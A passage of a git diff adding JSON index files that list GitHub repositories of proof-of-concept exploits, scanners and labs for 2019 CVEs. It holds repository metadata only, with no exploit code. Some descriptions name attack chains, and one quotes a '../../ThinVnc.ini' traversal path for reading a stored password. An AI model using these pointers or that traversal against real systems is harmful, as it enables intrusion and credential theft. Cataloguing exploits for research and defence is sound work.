"html_url": "https:\/\/github.com\/shadow-horse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shadow-horse\/CVE-2019-17571", + "description": "Apache Log4j 1.2.X存在反序列化远程代码执行漏洞", + "fork": false, + "created_at": "2019-12-25T16:46:11Z", + "updated_at": "2023-08-24T04:11:52Z", + "pushed_at": "2019-12-25T16:48:41Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 78, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 280048798, + "name": "CVE-2019-17571", + "full_name": "Al1ex\/CVE-2019-17571", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2019-17571", + "description": "Environment for CVE_2019_17571", + "fork": false, + "created_at": "2020-07-16T04:01:40Z", + "updated_at": "2024-08-12T20:03:48Z", + "pushed_at": "2020-10-13T23:36:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-17571" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438418716, + "name": "log4shell-finder", + "full_name": "HynekPetrak\/log4shell-finder", + "owner": { + "login": "HynekPetrak", + "id": 8593983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4", + "html_url": "https:\/\/github.com\/HynekPetrak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HynekPetrak\/log4shell-finder", + "description": "Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.", + "fork": false, + "created_at": "2021-12-14T22:27:14Z", + "updated_at": "2024-09-10T05:00:03Z", + "pushed_at": "2023-06-21T11:37:03Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5645", + "cve-2019-17571", + "cve-2020-9488", + "cve-2021-4104", + "cve-2021-42550", + "cve-2021-44228", + "cve-2021-44832", + "cve-2021-45046", + "cve-2021-45105", + "cve-2022-23302", + "cve-2022-23305", + "cve-2022-23307", + "log4j", + "log4j2", + "log4shell", + "scanner", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 38, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1759.json b/2019/CVE-2019-1759.json new file mode 100644 index 0000000000..8bbf4c1123 --- /dev/null +++ b/2019/CVE-2019-1759.json @@ -0,0 +1,33 @@ +[ + { + "id": 264169857, + "name": "CVE-2019-1759-csrf-js-rce", + "full_name": "r3m0t3nu11\/CVE-2019-1759-csrf-js-rce", + "owner": { + "login": "r3m0t3nu11", + "id": 26588044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26588044?v=4", + "html_url": "https:\/\/github.com\/r3m0t3nu11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3m0t3nu11\/CVE-2019-1759-csrf-js-rce", + "description": "Bolt-cms 3.6.10 Csrf -> xss -> rce", + "fork": false, + "created_at": "2020-05-15T10:54:20Z", + "updated_at": "2020-05-21T23:44:15Z", + "pushed_at": "2020-05-15T11:11:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17596.json b/2019/CVE-2019-17596.json new file mode 100644 index 0000000000..33008f410c --- /dev/null +++ b/2019/CVE-2019-17596.json @@ -0,0 +1,33 @@ +[ + { + "id": 216283040, + "name": "poc-dsa-verify-CVE-2019-17596", + "full_name": "pquerna\/poc-dsa-verify-CVE-2019-17596", + "owner": { + "login": "pquerna", + "id": 110123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110123?v=4", + "html_url": "https:\/\/github.com\/pquerna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pquerna\/poc-dsa-verify-CVE-2019-17596", + "description": "Demonstration of Go's dsa.Verify bug (CVE-2019-17596)", + "fork": false, + "created_at": "2019-10-19T23:32:02Z", + "updated_at": "2023-05-26T08:27:51Z", + "pushed_at": "2019-10-24T15:00:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17621.json b/2019/CVE-2019-17621.json new file mode 100644 index 0000000000..2993e72f0a --- /dev/null +++ b/2019/CVE-2019-17621.json @@ -0,0 +1,33 @@ +[ + { + "id": 515920254, + "name": "CVE-2019-17621", + "full_name": "Squirre17\/CVE-2019-17621", + "owner": { + "login": "Squirre17", + "id": 79578430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79578430?v=4", + "html_url": "https:\/\/github.com\/Squirre17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Squirre17\/CVE-2019-17621", + "description": "CVE-2019-17621 DLink_RCE", + "fork": false, + "created_at": "2022-07-20T09:39:36Z", + "updated_at": "2023-06-06T02:17:31Z", + "pushed_at": "2022-07-20T10:12:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17625.json b/2019/CVE-2019-17625.json new file mode 100644 index 0000000000..ba535ccc62 --- /dev/null +++ b/2019/CVE-2019-17625.json @@ -0,0 +1,33 @@ +[ + { + "id": 218678736, + "name": "CVE-2019-17625", + "full_name": "Ekultek\/CVE-2019-17625", + "owner": { + "login": "Ekultek", + "id": 14183473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14183473?v=4", + "html_url": "https:\/\/github.com\/Ekultek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ekultek\/CVE-2019-17625", + "description": "Working exploit code for CVE-2019-17625", + "fork": false, + "created_at": "2019-10-31T03:40:07Z", + "updated_at": "2023-09-28T11:07:38Z", + "pushed_at": "2020-03-12T18:22:19Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17633.json b/2019/CVE-2019-17633.json new file mode 100644 index 0000000000..440c09b792 --- /dev/null +++ b/2019/CVE-2019-17633.json @@ -0,0 +1,33 @@ +[ + { + "id": 229132579, + "name": "CVE-2019-17633", + "full_name": "mgrube\/CVE-2019-17633", + "owner": { + "login": "mgrube", + "id": 90159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90159?v=4", + "html_url": "https:\/\/github.com\/mgrube", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mgrube\/CVE-2019-17633", + "description": "Eclipse Che CSRF leading to RCE", + "fork": false, + "created_at": "2019-12-19T20:22:12Z", + "updated_at": "2024-05-06T20:49:53Z", + "pushed_at": "2019-12-20T16:45:35Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17638.json b/2019/CVE-2019-17638.json new file mode 100644 index 0000000000..d393772449 --- /dev/null +++ b/2019/CVE-2019-17638.json @@ -0,0 +1,33 @@ +[ + { + "id": 335844306, + "name": "CVE-2019-17638-Jetty", + "full_name": "forse01\/CVE-2019-17638-Jetty", + "owner": { + "login": "forse01", + "id": 76189258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4", + "html_url": "https:\/\/github.com\/forse01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forse01\/CVE-2019-17638-Jetty", + "description": null, + "fork": false, + "created_at": "2021-02-04T05:07:42Z", + "updated_at": "2023-04-20T01:21:13Z", + "pushed_at": "2021-02-09T03:16:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17658.json b/2019/CVE-2019-17658.json new file mode 100644 index 0000000000..d7257ab033 --- /dev/null +++ b/2019/CVE-2019-17658.json @@ -0,0 +1,40 @@ +[ + { + "id": 246558752, + "name": "CVE-2019-17658", + "full_name": "Ibonok\/CVE-2019-17658", + "owner": { + "login": "Ibonok", + "id": 37837775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37837775?v=4", + "html_url": "https:\/\/github.com\/Ibonok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ibonok\/CVE-2019-17658", + "description": "Unquoted Service Path exploit in FortiClient (CVE-2019-17658)", + "fork": false, + "created_at": "2020-03-11T11:58:24Z", + "updated_at": "2020-05-12T08:11:25Z", + "pushed_at": "2020-05-12T08:11:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-17658", + "description", + "forticlient", + "fortigate", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17662.json b/2019/CVE-2019-17662.json new file mode 100644 index 0000000000..ffac9a7d8c --- /dev/null +++ b/2019/CVE-2019-17662.json @@ -0,0 +1,256 @@ +[ + { + "id": 401821096, + "name": "CVE-2019-17662", + "full_name": "MuirlandOracle\/CVE-2019-17662", + "owner": { + "login": "MuirlandOracle", + "id": 58998623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58998623?v=4", + "html_url": "https:\/\/github.com\/MuirlandOracle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuirlandOracle\/CVE-2019-17662", + "description": "Exploit code for CVE-2019-17662", + "fork": false, + "created_at": "2021-08-31T19:30:09Z", + "updated_at": "2024-08-12T20:16:03Z", + "pushed_at": "2021-09-12T14:43:25Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 412325467, + "name": "Bash-Script-CVE-2019-17662", + "full_name": "kxisxr\/Bash-Script-CVE-2019-17662", + "owner": { + "login": "kxisxr", + "id": 47679627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47679627?v=4", + "html_url": "https:\/\/github.com\/kxisxr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kxisxr\/Bash-Script-CVE-2019-17662", + "description": "ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ..\/..\/ThinVnc.ini directory traversal attack vector.", + "fork": false, + "created_at": "2021-10-01T04:27:28Z", + "updated_at": "2021-12-02T07:31:31Z", + "pushed_at": "2022-08-20T07:19:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 412842804, + "name": "CVE-2019-17662", + "full_name": "whokilleddb\/CVE-2019-17662", + "owner": { + "login": "whokilleddb", + "id": 56482137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56482137?v=4", + "html_url": "https:\/\/github.com\/whokilleddb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whokilleddb\/CVE-2019-17662", + "description": "Exploit for CVE-2019-17662 (ThinVNC 1.0b1)", + "fork": false, + "created_at": "2021-10-02T15:57:11Z", + "updated_at": "2021-10-17T18:05:31Z", + "pushed_at": "2021-10-02T22:35:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-17662", + "exploit", + "poc", + "thinvnc" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 418410228, + "name": "CVE-2019-17662-Exploit", + "full_name": "rajendrakumaryadav\/CVE-2019-17662-Exploit", + "owner": { + "login": "rajendrakumaryadav", + "id": 13816347, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13816347?v=4", + "html_url": "https:\/\/github.com\/rajendrakumaryadav", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rajendrakumaryadav\/CVE-2019-17662-Exploit", + "description": "Exploit For CVE-2019-17662", + "fork": false, + "created_at": "2021-10-18T08:26:47Z", + "updated_at": "2021-10-19T01:41:15Z", + "pushed_at": "2021-10-18T10:16:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 505163308, + "name": "CVE-2019-17662", + "full_name": "Tamagaft\/CVE-2019-17662", + "owner": { + "login": "Tamagaft", + "id": 38216030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38216030?v=4", + "html_url": "https:\/\/github.com\/Tamagaft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tamagaft\/CVE-2019-17662", + "description": "Golang implementation of CVE-2019-17662 TinyVNC Arbitrary File Read leading to Authentication Bypass Exploit", + "fork": false, + "created_at": "2022-06-19T16:33:04Z", + "updated_at": "2022-06-20T11:41:51Z", + "pushed_at": "2022-06-20T11:37:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536061121, + "name": "CVE-2019-17662", + "full_name": "bl4ck574r\/CVE-2019-17662", + "owner": { + "login": "bl4ck574r", + "id": 94787830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94787830?v=4", + "html_url": "https:\/\/github.com\/bl4ck574r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bl4ck574r\/CVE-2019-17662", + "description": null, + "fork": false, + "created_at": "2022-09-13T09:53:45Z", + "updated_at": "2022-11-15T12:42:11Z", + "pushed_at": "2022-11-11T18:00:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 642644869, + "name": "CVE-2019-17662", + "full_name": "thomas-osgood\/CVE-2019-17662", + "owner": { + "login": "thomas-osgood", + "id": 20747585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4", + "html_url": "https:\/\/github.com\/thomas-osgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomas-osgood\/CVE-2019-17662", + "description": "Golang implementation of ThinVNC exploit CVE-2019-17662. For educational purposes only.", + "fork": false, + "created_at": "2023-05-19T03:12:44Z", + "updated_at": "2024-11-19T01:29:59Z", + "pushed_at": "2023-05-19T03:20:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 657123561, + "name": "vnc-lab-cve-2019-17662", + "full_name": "medarov411\/vnc-lab-cve-2019-17662", + "owner": { + "login": "medarov411", + "id": 60567375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60567375?v=4", + "html_url": "https:\/\/github.com\/medarov411", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/medarov411\/vnc-lab-cve-2019-17662", + "description": null, + "fork": false, + "created_at": "2023-06-22T11:19:27Z", + "updated_at": "2024-10-02T10:33:46Z", + "pushed_at": "2023-06-22T11:24:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17666.json b/2019/CVE-2019-17666.json new file mode 100644 index 0000000000..5298ffece2 --- /dev/null +++ b/2019/CVE-2019-17666.json @@ -0,0 +1,33 @@ +[ + { + "id": 817268585, + "name": "CVE-2019-17666", + "full_name": "uthrasri\/CVE-2019-17666", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2019-17666", + "description": null, + "fork": false, + "created_at": "2024-06-19T11:02:57Z", + "updated_at": "2024-06-19T12:46:40Z", + "pushed_at": "2024-06-19T12:46:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17671.json b/2019/CVE-2019-17671.json new file mode 100644 index 0000000000..929fc2ca64 --- /dev/null +++ b/2019/CVE-2019-17671.json @@ -0,0 +1,33 @@ +[ + { + "id": 252674527, + "name": "CVE-2019-17671", + "full_name": "rhbb\/CVE-2019-17671", + "owner": { + "login": "rhbb", + "id": 62225834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62225834?v=4", + "html_url": "https:\/\/github.com\/rhbb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhbb\/CVE-2019-17671", + "description": null, + "fork": false, + "created_at": "2020-04-03T08:29:07Z", + "updated_at": "2022-02-08T06:37:49Z", + "pushed_at": "2020-04-03T10:34:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1821.json b/2019/CVE-2019-1821.json new file mode 100644 index 0000000000..e1650338fe --- /dev/null +++ b/2019/CVE-2019-1821.json @@ -0,0 +1,41 @@ +[ + { + "id": 187835108, + "name": "CiscoExploit", + "full_name": "k8gege\/CiscoExploit", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/CiscoExploit", + "description": "Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution\/CVE-2019-1653\/Cisco SNMP RCE\/Dump Cisco RV320 Password)", + "fork": false, + "created_at": "2019-05-21T12:42:54Z", + "updated_at": "2024-10-22T07:48:36Z", + "pushed_at": "2019-05-21T14:52:36Z", + "stargazers_count": 130, + "watchers_count": 130, + "has_discussions": false, + "forks_count": 59, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cisco", + "exp", + "exploit", + "getshell", + "poc", + "rce" + ], + "visibility": "public", + "forks": 59, + "watchers": 130, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18276.json b/2019/CVE-2019-18276.json new file mode 100644 index 0000000000..6b6838a012 --- /dev/null +++ b/2019/CVE-2019-18276.json @@ -0,0 +1,64 @@ +[ + { + "id": 436750713, + "name": "CVE-2019-18276", + "full_name": "M-ensimag\/CVE-2019-18276", + "owner": { + "login": "M-ensimag", + "id": 95383953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95383953?v=4", + "html_url": "https:\/\/github.com\/M-ensimag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M-ensimag\/CVE-2019-18276", + "description": null, + "fork": false, + "created_at": "2021-12-09T20:22:01Z", + "updated_at": "2024-02-23T02:59:52Z", + "pushed_at": "2021-12-09T20:49:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 447195023, + "name": "CVE-2019-18276", + "full_name": "SABI-Ensimag\/CVE-2019-18276", + "owner": { + "login": "SABI-Ensimag", + "id": 97602072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97602072?v=4", + "html_url": "https:\/\/github.com\/SABI-Ensimag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SABI-Ensimag\/CVE-2019-18276", + "description": null, + "fork": false, + "created_at": "2022-01-12T11:40:57Z", + "updated_at": "2022-01-12T11:56:33Z", + "pushed_at": "2022-02-01T22:44:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18370.json b/2019/CVE-2019-18370.json new file mode 100644 index 0000000000..02375a3efc --- /dev/null +++ b/2019/CVE-2019-18370.json @@ -0,0 +1,33 @@ +[ + { + "id": 626379744, + "name": "CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis", + "full_name": "FzBacon\/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis", + "description": null, + "fork": false, + "created_at": "2023-04-11T10:58:30Z", + "updated_at": "2023-11-07T07:22:37Z", + "pushed_at": "2023-04-14T01:59:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18371.json b/2019/CVE-2019-18371.json new file mode 100644 index 0000000000..f5e51cf181 --- /dev/null +++ b/2019/CVE-2019-18371.json @@ -0,0 +1,95 @@ +[ + { + "id": 205419461, + "name": "Xiaomi_Mi_WiFi_R3G_Vulnerability_POC", + "full_name": "UltramanGaia\/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC", + "owner": { + "login": "UltramanGaia", + "id": 17355647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17355647?v=4", + "html_url": "https:\/\/github.com\/UltramanGaia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UltramanGaia\/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC", + "description": "A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to version 2.28.23.", + "fork": false, + "created_at": "2019-08-30T16:32:13Z", + "updated_at": "2024-10-27T07:37:04Z", + "pushed_at": "2020-01-12T02:34:45Z", + "stargazers_count": 182, + "watchers_count": 182, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 182, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 427663719, + "name": "UltramanGaia", + "full_name": "AjayMT6\/UltramanGaia", + "owner": { + "login": "AjayMT6", + "id": 94227662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94227662?v=4", + "html_url": "https:\/\/github.com\/AjayMT6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AjayMT6\/UltramanGaia", + "description": "A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to versi…", + "fork": false, + "created_at": "2021-11-13T12:51:18Z", + "updated_at": "2022-03-01T12:36:45Z", + "pushed_at": "2022-03-01T12:36:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 494837127, + "name": "UltramanGaia", + "full_name": "jsnhcuan1997\/UltramanGaia", + "owner": { + "login": "jsnhcuan1997", + "id": 105985515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105985515?v=4", + "html_url": "https:\/\/github.com\/jsnhcuan1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsnhcuan1997\/UltramanGaia", + "description": "A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to versi…", + "fork": false, + "created_at": "2022-05-21T16:30:37Z", + "updated_at": "2022-05-21T16:30:37Z", + "pushed_at": "2022-05-21T16:30:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18426.json b/2019/CVE-2019-18426.json new file mode 100644 index 0000000000..da6114ea4b --- /dev/null +++ b/2019/CVE-2019-18426.json @@ -0,0 +1,35 @@ +[ + { + "id": 244045140, + "name": "CVE-2019-18426", + "full_name": "PerimeterX\/CVE-2019-18426", + "owner": { + "login": "PerimeterX", + "id": 10051748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10051748?v=4", + "html_url": "https:\/\/github.com\/PerimeterX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PerimeterX\/CVE-2019-18426", + "description": null, + "fork": false, + "created_at": "2020-02-29T21:36:46Z", + "updated_at": "2024-03-12T15:23:28Z", + "pushed_at": "2020-03-05T12:29:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-18426" + ], + "visibility": "public", + "forks": 11, + "watchers": 10, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18634.json b/2019/CVE-2019-18634.json new file mode 100644 index 0000000000..1d747ecbc4 --- /dev/null +++ b/2019/CVE-2019-18634.json @@ -0,0 +1,312 @@ +[ + { + "id": 238829481, + "name": "CVE-2019-18634", + "full_name": "Plazmaz\/CVE-2019-18634", + "owner": { + "login": "Plazmaz", + "id": 1331014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1331014?v=4", + "html_url": "https:\/\/github.com\/Plazmaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Plazmaz\/CVE-2019-18634", + "description": "A functional exploit for CVE-2019-18634, a BSS overflow in sudo's pwfeedback feature that allows for for privesc", + "fork": false, + "created_at": "2020-02-07T02:41:44Z", + "updated_at": "2024-08-12T19:57:26Z", + "pushed_at": "2020-02-19T03:47:33Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 57, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 238993261, + "name": "sudo-cve-2019-18634", + "full_name": "saleemrashid\/sudo-cve-2019-18634", + "owner": { + "login": "saleemrashid", + "id": 22301423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22301423?v=4", + "html_url": 